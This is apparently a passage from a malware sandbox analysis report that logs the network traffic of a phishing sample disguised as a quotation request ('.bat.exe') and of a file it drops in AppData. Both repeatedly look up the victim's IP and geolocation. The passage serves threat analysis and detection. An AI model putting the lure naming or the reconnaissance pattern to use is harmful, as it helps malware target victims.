                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 7717254faafbb1f181484487840ee0a2
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.549717158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:09.432219028 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:10.016171932 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 72ced0b97171ec682307d9bef137544b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 20, 2024 09:33:10.019756079 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:10.177064896 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:10 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: cea2a84dc5a0f347b2b96638a6518dca
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 20, 2024 09:33:10.987672091 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:11.148333073 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:11 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 8269921bf29e18c97eea0d7f13256ac0
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.549718158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:09.615515947 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:10.178440094 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:10 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: eb45a2bd28bf5e9653e151d1d60f74b1
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.549721158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:10.815464020 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:11.378704071 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:11 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 916a1d0fb7b8bf21f5ac1dce3d6ff030
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.549724158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:11.772047997 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:12.335205078 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: f5bd67b97927f703f528be71a2b76a0e
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.549725158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:12.024102926 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:12.600101948 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 41911c4174855dfb23e226c792ba66b6
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.549728158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:12.957039118 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:13.549091101 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 3462dc0d17cfb73f447a2eb0d508e9c7
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.549729158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:13.291140079 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:13.953402042 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: b411286227d429fc3b8bd571f7112314
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.549732158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:14.179128885 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:14.743051052 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:14 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 336a51fbc21351deb401238b76286894
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.549733158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:14.586076975 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:15.163778067 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: d9c76760b5210408360d03a08acdb6bf
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.549736158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:15.381143093 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:15.979320049 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 8defebf625335ed2872d9a420da53c4e
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.549739158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:16.630717993 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:17.197326899 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:17 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: f452fee9286ddd59b2bbeee3577e80b5
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.549743158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:17.805315018 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:18.400226116 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 2947a0e29c71693db4a52fef4bed56d0
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.549753158.101.44.242806448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:19.165551901 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:19.734417915 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:19 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: bfcf91c40ed20faace8a55875351f40d
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.549709188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:06 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:06 UTC850INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:06 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55495
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eg1THk%2BeMbwG73IKUu2gSkClq0VmAA1AIiaTqiWkC9zfEqdPLoWL8o41%2BbSVd6QbaI609oGcNTOpWe3xxdVyjxCNe8ktbibl36k6NNA2xDm18LXi%2BYvNao3DqjCaWkx3jC2gPiix"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717de3dcd41bb-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2508&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1170809&cwnd=203&unsent_bytes=0&cid=7819ad9fcb749890&ts=421&x=0"
                                                                                                            2024-11-20 08:33:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.549710188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:06 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:07 UTC858INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:07 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55496
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ReX7GAm8TLJ8eqwIEsrWzGxi3AysPPpzp9R%2Fk24QFKWmHC3LclkVk92Q42GuXiHKtaCVOgKY5SIJaP7K%2FjMhS8mazWUXpJBjdS154pA7%2FThWGKJ7EbLe%2BiyxI%2FV%2FaSYu1giKD8v%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5717e31ae117ad-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1456&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1974306&cwnd=171&unsent_bytes=0&cid=be25d0500fbc3a35&ts=140&x=0"
                                                                                                            2024-11-20 08:33:07 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
